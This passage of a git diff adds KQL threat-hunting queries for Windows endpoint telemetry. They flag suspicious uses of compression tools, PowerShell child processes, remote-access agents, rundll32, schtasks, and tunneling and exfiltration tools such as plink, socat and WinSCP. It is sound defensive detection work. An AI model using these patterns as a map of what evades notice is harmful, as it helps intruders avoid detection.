index 00000000..8abde06b
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_compression_tool_parameters.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Compression Tool Parameters
+// Author: Florian Roth (Nextron Systems), Samir Bousseaden
+// Date: 2019-10-15
+// Level: medium
+// Description: Detects potentially suspicious command line arguments of common data compression tools
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001, detection.threat-hunting
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -p" or ProcessCommandLine contains " -ta" or ProcessCommandLine contains " -tb" or ProcessCommandLine contains " -sdel" or ProcessCommandLine contains " -dw" or ProcessCommandLine contains " -hp") and ((ProcessVersionInfoOriginalFileName contains "7z" and ProcessVersionInfoOriginalFileName contains ".exe") or ProcessVersionInfoOriginalFileName endswith "rar.exe" or (ProcessVersionInfoOriginalFileName contains "Command" and ProcessVersionInfoOriginalFileName contains "Line" and ProcessVersionInfoOriginalFileName contains "RAR"))) and (not((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_powershell_child_processes.kql b/KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_powershell_child_processes.kql
new file mode 100644
index 00000000..53be99b2
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_powershell_child_processes.kql
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious PowerShell Child Processes
+// Author: Florian Roth (Nextron Systems), Tim Shelton
+// Date: 2022-04-26
+// Level: medium
+// Description: Detects potentially suspicious child processes spawned by PowerShell.
+// Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.threat-hunting
+// False Positives:
+//   - False positives are to be expected from PowerShell scripts that might make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts.
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and (InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (not(((ProcessCommandLine contains "-verifystore " and FolderPath endswith "\\certutil.exe") or ((ProcessCommandLine contains "qfe list" or ProcessCommandLine contains "diskdrive " or ProcessCommandLine contains "csproduct " or ProcessCommandLine contains "computersystem " or ProcessCommandLine contains " os " or ProcessCommandLine startswith "") and FolderPath endswith "\\wmic.exe")))) and (not((ProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\" and InitiatingProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/process_execution_from_webdav_share.kql b/KQL/rules-threat-hunting/windows/process_creation/process_execution_from_webdav_share.kql
new file mode 100644
index 00000000..2cc0ed80
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/process_execution_from_webdav_share.kql
@@ -0,0 +1,15 @@
+// Title: Process Execution From WebDAV Share
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-13
+// Level: low
+// Description: Detects execution of processes with image paths starting with WebDAV shares (\\), which might indicate malicious file execution from remote web shares.
+// Execution of processes from WebDAV shares can be a sign of lateral movement or exploitation attempts, especially if the process is not a known legitimate application.
+// Exploitation Attempt of vulnerabilities like CVE-2025-33053 also involves executing processes from WebDAV paths.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.command-and-control, attack.lateral-movement, attack.t1105, detection.threat-hunting
+// False Positives:
+//   - Legitimate use of WebDAV shares for process execution
+//   - Known applications executing from WebDAV paths
+
+DeviceProcessEvents
+| where FolderPath contains "\\DavWWWRoot\\" and FolderPath startswith "\\\\"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/process_terminated_via_taskkill.kql b/KQL/rules-threat-hunting/windows/process_creation/process_terminated_via_taskkill.kql
new file mode 100644
index 00000000..57e847f0
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/process_terminated_via_taskkill.kql
@@ -0,0 +1,13 @@
+// Title: Process Terminated Via Taskkill
+// Author: frack113, MalGamy (Nextron Systems), Nasreddine Bencherchali
+// Date: 2021-12-26
+// Level: low
+// Description: Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity.
+// Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489, detection.threat-hunting
+// False Positives:
+//   - Expected FP with some processes using this techniques to terminate one of their processes during installations and updates
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -im " or ProcessCommandLine contains " /im " or ProcessCommandLine contains " –im " or ProcessCommandLine contains " —im " or ProcessCommandLine contains " ―im " or ProcessCommandLine contains " -pid " or ProcessCommandLine contains " /pid " or ProcessCommandLine contains " –pid " or ProcessCommandLine contains " —pid " or ProcessCommandLine contains " ―pid ") and (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f " or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " /f" or ProcessCommandLine endswith " –f" or ProcessCommandLine endswith " —f" or ProcessCommandLine endswith " ―f") and (FolderPath endswith "\\taskkill.exe" or ProcessVersionInfoOriginalFileName =~ "taskkill.exe")) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp") and InitiatingProcessFolderPath endswith ".tmp")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql
new file mode 100644
index 00000000..0ad02020
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql
@@ -0,0 +1,20 @@
+// Title: Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions
+// Author: @kostastsale
+// Date: 2023-04-13
+// Level: medium
+// Description: Detects the execution of Action1 in order to execute arbitrary code or establish a remote session.
+// Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries.
+// Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed.
+// Hunting Opportunity 1- Weed Out The Noise
+// When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through  a policy with name "test_app_1":
+// ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0"
+// After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences.
+// Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours
+// If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002, detection.threat-hunting
+// False Positives:
+//   - If Action1 is among the approved software in your environment, you might find that this is a noisy query. See description for ideas on how to alter this query and start looking for suspicious activities.
+
+DeviceProcessEvents
+| where (FolderPath contains "\\Windows\\Action1\\package_downloads\\" and InitiatingProcessFolderPath endswith "\\action1_agent.exe") or ((InitiatingProcessCommandLine contains "\\Action1\\scripts\\Run_Command_" or InitiatingProcessCommandLine contains "\\Action1\\scripts\\Run_PowerShell_") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe")) or FolderPath endswith "\\agent1_remote.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_ammy_admin_agent_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_ammy_admin_agent_execution.kql
new file mode 100644
index 00000000..33864ef7
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_ammy_admin_agent_execution.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - Ammy Admin Agent Execution
+// Author: @kostastsale
+// Date: 2024-08-05
+// Level: medium
+// Description: Detects the execution of the Ammy Admin RMM agent for remote management.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, detection.threat-hunting
+// False Positives:
+//   - Legitimate use of Ammy Admin RMM agent for remote management by admins.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "AMMYY\\aa_nts.dll\",run" and FolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_cmd_exe_execution_via_anyviewer.kql b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_cmd_exe_execution_via_anyviewer.kql
new file mode 100644
index 00000000..e74fe141
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_cmd_exe_execution_via_anyviewer.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - Cmd.EXE Execution via AnyViewer
+// Author: @kostastsale
+// Date: 2024-08-03
+// Level: medium
+// Description: Detects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, detection.threat-hunting
+// False Positives:
+//   - Legitimate use for admin activity.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine contains "AVCore.exe\" -d" and InitiatingProcessFolderPath endswith "\\AVCore.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution_hunting.kql b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution_hunting.kql
new file mode 100644
index 00000000..e692c9a3
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution_hunting.kql
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - ScreenConnect Remote Command Execution - Hunting
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: medium
+// Description: Detects remote binary or command execution via the ScreenConnect Service.
+// Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.threat-hunting
+// False Positives:
+//   - Legitimate commands launched from ScreenConnect will also trigger this rule. Look for anomalies.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\ScreenConnect.ClientService.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql b/KQL/rules-threat-hunting/windows/process_creation/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql
new file mode 100644
index 00000000..55114655
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql
@@ -0,0 +1,13 @@
+// Title: Rundll32.EXE Calling DllRegisterServer Export Function Explicitly
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-10-17
+// Level: medium
+// Description: Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
+// False Positives:
+//   - Legitimate usage as part of application installation, but less likely from e.g. temporary paths.
+//   - Not every instance is considered malicious, but this rule will capture the malicious usages.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "DllRegisterServer" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not((ProcessCommandLine contains ":\\Program Files (x86)" or ProcessCommandLine contains ":\\Program Files\\" or ProcessCommandLine contains ":\\Windows\\System32\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/sc_exe_query_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/sc_exe_query_execution.kql
new file mode 100644
index 00000000..91ba6406
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/sc_exe_query_execution.kql
@@ -0,0 +1,13 @@
+// Title: SC.EXE Query Execution
+// Author: frack113
+// Date: 2021-12-06
+// Level: low
+// Description: Detects execution of "sc.exe" to query information about registered services on the system
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1007, detection.threat-hunting
+// False Positives:
+//   - Legitimate query of a service by an administrator to get more information such as the state or PID
+//   - Keybase process "kbfsdokan.exe" query the dokan1 service with the following commandline "sc query dokan1"
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " query" and (FolderPath endswith "\\sc.exe" and ProcessVersionInfoOriginalFileName =~ "sc.exe")) and (not(ProcessCommandLine =~ "sc query dokan1"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/scheduled_task_creation_from_potential_suspicious_parent_location.kql b/KQL/rules-threat-hunting/windows/process_creation/scheduled_task_creation_from_potential_suspicious_parent_location.kql
new file mode 100644
index 00000000..c1b8a721
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/scheduled_task_creation_from_potential_suspicious_parent_location.kql
@@ -0,0 +1,13 @@
+// Title: Scheduled Task Creation From Potential Suspicious Parent Location
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-23
+// Level: medium
+// Description: Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location.
+// Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting
+// False Positives:
+//   - Software installers that run from temporary folders and also install scheduled tasks
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\AppData\\Roaming\\" or InitiatingProcessFolderPath contains "\\Temporary Internet" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "update_task.xml" or ProcessCommandLine contains "unattended.ini")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/set_files_as_system_files_using_attrib_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/set_files_as_system_files_using_attrib_exe.kql
new file mode 100644
index 00000000..db3b3197
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/set_files_as_system_files_using_attrib_exe.kql
@@ -0,0 +1,10 @@
+// Title: Set Files as System Files Using Attrib.EXE
+// Author: frack113
+// Date: 2022-02-04
+// Level: low
+// Description: Detects the execution of "attrib" with the "+s" flag to mark files as system files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001, detection.threat-hunting
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " +s " and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/smb_over_quic_via_net_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/smb_over_quic_via_net_exe.kql
new file mode 100644
index 00000000..b3f171fb
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/smb_over_quic_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: SMB over QUIC Via Net.EXE
+// Author: frack113
+// Date: 2023-07-21
+// Level: medium
+// Description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1570, detection.threat-hunting
+// False Positives:
+//   - Administrative activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/TRANSPORT:QUIC" and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/suspicious_new_instance_of_an_office_com_object.kql b/KQL/rules-threat-hunting/windows/process_creation/suspicious_new_instance_of_an_office_com_object.kql
new file mode 100644
index 00000000..bb118400
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/suspicious_new_instance_of_an_office_com_object.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious New Instance Of An Office COM Object
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-13
+// Level: medium
+// Description: Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.
+// This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting
+// False Positives:
+//   - Legitimate usage of office automation via scripting
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\eqnedt32.exe" or FolderPath endswith "\\excel.exe" or FolderPath endswith "\\msaccess.exe" or FolderPath endswith "\\mspub.exe" or FolderPath endswith "\\powerpnt.exe" or FolderPath endswith "\\visio.exe" or FolderPath endswith "\\winword.exe") and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/suspicious_tasklist_discovery_command.kql b/KQL/rules-threat-hunting/windows/process_creation/suspicious_tasklist_discovery_command.kql
new file mode 100644
index 00000000..5294fe21
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/suspicious_tasklist_discovery_command.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Tasklist Discovery Command
+// Author: frack113
+// Date: 2021-12-11
+// Level: informational
+// Description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1057, detection.threat-hunting
+// False Positives:
+//   - Likely from users, administrator and different internal and third party applications.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "tasklist" or FolderPath endswith "\\tasklist.exe" or ProcessVersionInfoOriginalFileName =~ "tasklist.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/system_information_discovery_via_wmic_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/system_information_discovery_via_wmic_exe.kql
new file mode 100644
index 00000000..9e3f60f9
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/system_information_discovery_via_wmic_exe.kql
@@ -0,0 +1,14 @@
+// Title: System Information Discovery Via Wmic.EXE
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-12-19
+// Level: low
+// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
+// including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS,
+// and GPU driver products/versions.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082, detection.threat-hunting
+// False Positives:
+//   - VMWare Tools serviceDiscovery scripts
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "caption" or ProcessCommandLine contains "command" or ProcessCommandLine contains "driverversion" or ProcessCommandLine contains "maxcapacity" or ProcessCommandLine contains "name" or ProcessCommandLine contains "osarchitecture" or ProcessCommandLine contains "product" or ProcessCommandLine contains "size" or ProcessCommandLine contains "smbiosbiosversion" or ProcessCommandLine contains "version" or ProcessCommandLine contains "videomodedescription") and (ProcessCommandLine contains "baseboard" or ProcessCommandLine contains "bios" or ProcessCommandLine contains "cpu" or ProcessCommandLine contains "diskdrive" or ProcessCommandLine contains "logicaldisk" or ProcessCommandLine contains "memphysical" or ProcessCommandLine contains "os" or ProcessCommandLine contains "path" or ProcessCommandLine contains "startup" or ProcessCommandLine contains "win32_videocontroller") and ProcessCommandLine contains "get" and (ProcessVersionInfoFileDescription =~ "WMI Commandline Utility" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")) and (not(InitiatingProcessCommandLine contains "\\VMware\\VMware Tools\\serviceDiscovery\\scripts\\"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/tunneling_tool_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/tunneling_tool_execution.kql
new file mode 100644
index 00000000..f6c41498
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/tunneling_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: Tunneling Tool Execution
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1041, attack.t1572, attack.t1071.001, detection.threat-hunting
+// False Positives:
+//   - Legitimate administrators using one of these tools
+
+DeviceProcessEvents
+| where FolderPath endswith "\\httptunnel.exe" or FolderPath endswith "\\plink.exe" or FolderPath endswith "\\socat.exe" or FolderPath endswith "\\stunnel.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/unusually_long_powershell_commandline.kql b/KQL/rules-threat-hunting/windows/process_creation/unusually_long_powershell_commandline.kql
new file mode 100644
index 00000000..a945269d
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/unusually_long_powershell_commandline.kql
@@ -0,0 +1,10 @@
+// Title: Unusually Long PowerShell CommandLine
+// Author: oscd.community, Natalia Shornikova
+// Date: 2020-10-06
+// Level: low
+// Description: Detects unusually long PowerShell command lines with a length of 1000 characters or more
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.threat-hunting
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex ".{1000,}" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows Powershell" or ProcessVersionInfoProductName =~ "PowerShell Core 6")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/use_short_name_path_in_command_line.kql b/KQL/rules-threat-hunting/windows/process_creation/use_short_name_path_in_command_line.kql
new file mode 100644
index 00000000..4cb588e6
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/use_short_name_path_in_command_line.kql
@@ -0,0 +1,18 @@
+// Title: Use Short Name Path in Command Line
+// Author: frack113, Nasreddine Bencherchali
+// Date: 2022-08-07
+// Level: medium
+// Description: Detects the use of short name paths (8.3 format) in command lines, which can be used to obfuscate paths or access restricted locations.
+// Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs.
+// When investigating, examine:
+// - Commands using short paths to access sensitive directories or files
+// - Web servers on Windows (especially Apache) where short filenames could bypass security controls
+// - Correlation with other suspicious behaviors
+// - baseline of short name usage in your environment and look for deviations
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004, detection.threat-hunting
+// False Positives:
+//   - Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "~1\\" or ProcessCommandLine contains "~2\\") and (not(((InitiatingProcessFolderPath endswith "\\csc.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v") or ((FolderPath contains "\\AppData\\" and FolderPath contains "\\Temp\\") or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe")) or (InitiatingProcessFolderPath endswith "\\winget.exe" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\WinGet\\")))) and (not(((InitiatingProcessFolderPath endswith "\\aurora-agent-64.exe" or InitiatingProcessFolderPath endswith "\\aurora-agent.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\GPSoftware\\Directory Opus\\dopus.exe" or InitiatingProcessFolderPath endswith "\\Everything\\Everything.exe" or (ProcessCommandLine contains "C:\\Program Files\\Git\\post-install.bat" or ProcessCommandLine contains "C:\\Program Files\\Git\\cmd\\scalar.exe") or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or InitiatingProcessFolderPath endswith "\\veeam.backup.shell.exe" or (InitiatingProcessFolderPath endswith "\\WebEx\\webexhost.exe" or ProcessCommandLine contains "\\appdata\\local\\webex\\webex64\\meetings\\wbxreport.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/winscp_execution_from_non_standard_folder.kql b/KQL/rules-threat-hunting/windows/process_creation/winscp_execution_from_non_standard_folder.kql
new file mode 100644
index 00000000..2ceacb0f
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/winscp_execution_from_non_standard_folder.kql
@@ -0,0 +1,10 @@
+// Title: Winscp Execution From Non Standard Folder
+// Author: frack113
+// Date: 2025-10-12
+// Level: medium
+// Description: Detects the execution of Winscp from an a non standard folder. This could indicate the execution of Winscp portable.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048, detection.threat-hunting
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\WinSCP.exe" or ProcessVersionInfoOriginalFileName =~ "winscp.exe") and (not(FolderPath startswith "C:\\Program Files (x86)\\WinSCP\\"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql b/KQL/rules-threat-hunting/windows/process_creation/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql
new file mode 100644
index 00000000..2adf8368
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql
@@ -0,0 +1,12 @@
+// Title: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
+// Author: Michael Haag
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007, detection.threat-hunting
+// False Positives:
+//   - Some additional tuning is required. It is recommended to add the user profile path in CommandLine if it is getting too noisy.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".js" or ProcessCommandLine contains ".jse" or ProcessCommandLine contains ".vba" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".wsf") and ((ProcessVersionInfoOriginalFileName in~ ("wscript.exe", "cscript.exe")) or (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/registry/registry_event/scheduled_task_created_registry.kql b/KQL/rules-threat-hunting/windows/registry/registry_event/scheduled_task_created_registry.kql
new file mode 100644
index 00000000..1eba0045
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/registry/registry_event/scheduled_task_created_registry.kql
@@ -0,0 +1,12 @@
+// Title: Scheduled Task Created - Registry
+// Author: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team
+// Date: 2023-09-27
+// Level: low
+// Description: Detects the creation of a scheduled task via Registry keys.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.s0111, attack.t1053.005, car.2013-08-001, detection.threat-hunting
+// False Positives:
+//   - Likely as this is a normal behaviour on Windows
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks*" or RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/registry/registry_set/command_executed_via_run_dialog_box_registry.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/command_executed_via_run_dialog_box_registry.kql
new file mode 100644
index 00000000..24eb1cbb
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/registry/registry_set/command_executed_via_run_dialog_box_registry.kql
@@ -0,0 +1,13 @@
+// Title: Command Executed Via Run Dialog Box - Registry
+// Author: Ahmed Farouk, Nasreddine Bencherchali
+// Date: 2024-11-01
+// Level: low
+// Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
+// This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
+// MITRE Tactic: Execution
+// Tags: detection.threat-hunting, attack.execution
+// False Positives:
+//   - Likely
+
+DeviceRegistryEvents
